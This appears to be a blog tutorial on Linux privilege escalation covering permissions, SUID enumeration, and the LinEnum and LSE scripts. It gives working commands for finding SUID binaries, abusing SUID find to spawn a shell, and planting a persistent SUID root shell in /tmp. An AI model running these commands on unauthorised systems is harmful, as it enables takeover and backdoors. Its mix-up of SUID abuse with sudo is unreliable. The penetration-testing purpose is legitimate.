The best way to gain privilege escalation in 2025

 March 11, 2025  Leave a Comment on The best way to gain privilege escalation in 2025  Posted in Blog 0 Likes 42 Views

Introduction

Gaining a foothold on a Linux system is only half the battle. Real control comes from privilege escalation — moving from a low-privileged shell to full root access. This three-part series, based on Tib3rius’ widely respected guide, explores practical privilege escalation techniques you can use in penetration tests, OSCP labs, or real-world red team engagements.

In Part 1, we’ll cover core Linux permission concepts, SUID binaries, and systematic enumeration using tools like LinEnum and Linux Smart Enumeration (LSE).

What Is Linux Privilege Escalation?

Privilege escalation refers to exploiting a system misconfiguration or vulnerability to gain higher-level permissions. On Linux systems, that usually means becoming the root user—giving you unrestricted access to files, processes, and the ability to pivot deeper into a network.

To be effective, you must first understand how Linux handles permissions, users, and files — and how attackers abuse them.

Understanding Linux Permissions

Every file and directory on a Linux system has three sets of permissions:

  • Owner
  • Group
  • Others (everyone else)

Each set can include:

  • Read (r)
  • Write (w)
  • Execute (x)

You can view permissions using:

ls -l /bin/bash

This might return:

-rwxr-xr-x 1 root root 1037528 Apr 10  2023 /bin/bash

The first 10 characters show:

  • - → regular file
  • rwx for the owner (root)
  • r-x for the group
  • r-x for others

Users and Groups

Linux users are listed in /etc/passwd and their password hashes in /etc/shadow (only readable by root).

To view your current user and group IDs:

id

You’ll see something like:

uid=1000(user) gid=1000(user) groups=1000(user),27(sudo)

To escalate privileges, your goal is to change that uid from 1000 to 0—root.

SUID and SGID Explained

SUID (Set User ID) and SGID (Set Group ID) are special permissions. When a file has the SUID bit set, it runs with the privileges of the file’s owner, not the user running it.

SUID is indicated by an s in the execute position:

-rwsr-xr-x 1 root root 1037528 Apr 10  2023 /bin/bash

To find all SUID/SGID files:

find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -l {} \; 2>/dev/null

If a root-owned binary has SUID set and you can exploit it, you can get a root shell.

Creating a Custom SUID Root Shell

If you can execute commands as root (via cron job, writable script, or vulnerability), you can create a persistent SUID shell:

cp /bin/bash /tmp/rootbash
chmod +s /tmp/rootbash

Then execute it:

/tmp/rootbash -p

The -p option preserves the elevated privileges and drops you into a root shell.

Enumeration is Everything

Privilege escalation depends on identifying misconfigurations. Manual enumeration is possible, but automated tools save time and improve consistency.

LinEnum

LinEnum is a bash script that enumerates common privilege escalation vectors.

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh

What it checks:

  • SUID/SGID files
  • Cron jobs
  • Writable directories
  • Kernel version
  • PATH misuse
  • sudo permissions
  • And more

Linux Smart Enumeration (LSE)

This is a newer, smarter tool that outputs levels of detail (1–3).

wget https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh
chmod +x lse.sh
./lse.sh -l1

It’s especially useful when Python isn’t installed.

Case Study: Exploiting a SUID Binary with GTFOBins

Let’s say find has the SUID bit set.

Check GTFOBins (https://gtfobins.github.io) and you’ll find:

find . -exec /bin/sh \; -quit

If find is SUID, this gives you root immediately:

sudo find . -exec /bin/sh \; -quit

Or use it to drop a custom SUID binary:

echo "cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash" > exploit.sh
chmod +x exploit.sh
find . -exec ./exploit.sh \; -quit
/tmp/rootbash -p

Kernel Enumeration

Some privilege escalation attacks target vulnerable kernels.

Check your kernel version:

uname -a

Then search for known exploits:

searchsploit linux kernel 4.15

Or use:

https://github.com/jondonas/linux-exploit-suggester-2

Summary

In this first part of the series, you’ve learned:

  • How users, groups, and permissions work
  • How SUID/SGID files enable privilege escalation
  • How to enumerate a system using LinEnum and LSE
  • How to exploit misconfigurations to gain root access

Leave a Reply

Your email address will not be published. Required fields are marked *